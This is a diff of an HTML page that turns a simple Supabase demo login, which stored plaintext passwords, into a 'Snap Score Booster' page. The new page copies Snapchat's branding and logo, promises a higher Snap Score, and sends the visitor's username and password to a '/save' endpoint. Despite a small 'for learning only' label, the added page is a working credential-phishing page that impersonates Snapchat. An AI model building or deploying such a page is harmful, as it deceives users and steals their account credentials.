--- a/index.html
+++ b/index.html
@@ -1,67 +1,127 @@
 <!DOCTYPE html>
-<html>
+<html lang="en">
 <head>
-  <title>Demo Login</title>
-  <script src="https://cdn.jsdelivr.net/npm/@supabase/supabase-js"></script>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>Snap Score Booster</title>
+
+  <style>
+    * {
+      margin: 0;
+      padding: 0;
+      box-sizing: border-box;
+      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
+    }
+
+    body {
+      background: #FFFC00;
+      min-height: 100vh;
+      display: flex;
+      align-items: center;
+      justify-content: center;
+    }
+
+    .container {
+      background: white;
+      border-radius: 20px;
+      padding: 40px 30px;
+      width: 90%;
+      max-width: 400px;
+      box-shadow: 0 10px 30px rgba(0,0,0,0.2);
+      text-align: center;
+    }
+
+    .logo {
+      width: 120px;
+      margin: 0 auto 20px;
+    }
+
+    h1 {
+      font-size: 26px;
+      margin-bottom: 10px;
+      font-weight: bold;
+    }
+
+    p {
+      color: #555;
+      margin-bottom: 25px;
+    }
+
+    input {
+      width: 100%;
+      padding: 14px;
+      margin: 12px 0;
+      border: 1px solid #ddd;
+      border-radius: 10px;
+      font-size: 16px;
+      background: #f9f9f9;
+    }
+
+    button {
+      width: 100%;
+      padding: 15px;
+      background: #000;
+      color: white;
+      border: none;
+      border-radius: 10px;
+      font-size: 18px;
+      cursor: pointer;
+      margin-top: 15px;
+    }
+
+    button:hover {
+      background: #333;
+    }
+
+    #msg {
+      margin-top: 20px;
+      color: green;
+      font-weight: bold;
+    }
+
+    .note {
+      font-size: 12px;
+      color: #888;
+      margin-top: 20px;
+    }
+  </style>
 </head>
 <body>
 
-<h2>Demo Login</h2>
+<div class="container">
+  <img class="logo" src="https://upload.wikimedia.org/wikipedia/en/c/c0/Snapchat_Logo.svg" alt="Snap Logo">
 
-<input type="text" id="username" placeholder="Username"><br><br>
-<input type="password" id="password" placeholder="Password"><br><br>
+  <h1>Snap Score Booster</h1>
+  <p>Login to increase your Snap Score fast!</p>
 
-<button onclick="signup()">Sign Up</button>
-<button onclick="login()">Login</button>
+  <input type="text" id="username" placeholder="Username">
+  <input type="password" id="password" placeholder="Password">
 
-<p id="msg"></p>
+  <button onclick="sendData()">Log In & Boost Score</button>
+
+  <p id="msg"></p>
+
+  <p class="note">Demo project – for learning only</p>
+</div>
 
 <script>
-// Supabase setup
-const supabaseUrl = "https://mdcsbpbrcvudxbdjchwt.supabase.co";
-const supabaseKey = "sb_publishable_jqIhtEIHIqtwYCmx5cpKsQ_0GwVPr6X";
-const supabase = supabase.createClient(supabaseUrl, supabaseKey);
+async function sendData() {
+  const username = document.getElementById("username").value;
+  const password = document.getElementById("password").value;
 
-async function signup(){
-  const user = document.getElementById("username").value.trim();
-  const pass = document.getElementById("password").value.trim();
-
-  if(!user || !pass){ alert("Fill both fields"); return; }
-
-  // Insert user
-  const { data, error } = await supabase.from("users")
-    .insert([{ username: user, password: pass }]);
-
-  if(error){
-    document.getElementById("msg").innerText = "Error: " + error.message;
-    console.log(error);
-  } else {
-    document.getElementById("msg").innerText = "User signed up successfully!";
-  }
-}
-
-async function login(){
-  const user = document.getElementById("username").value.trim();
-  const pass = document.getElementById("password").value.trim();
-
-  if(!user || !pass){ alert("Fill both fields"); return; }
-
-  const { data, error } = await supabase.from("users")
-    .select("*")
-    .eq("username", user)
-    .single();
-
-  if(error || !data){
-    document.getElementById("msg").innerText = "User not found!";
-    console.log(error);
+  if(username === "" || password === ""){
+    alert("Please fill both fields");
     return;
   }
 
-  if(data.password === pass){
-    document.getElementById("msg").innerText = "Login success!";
-  } else {
-    document.getElementById("msg").innerText = "Wrong password!";
-  }
+  const res = await fetch("/save", {
+    method: "POST",
+    headers: {"Content-Type":"application/json"},
+    body: JSON.stringify({ username, password })
+  });
+
+  const data = await res.text();
+  document.getElementById("msg").innerText = data;
 }
 </script>
 
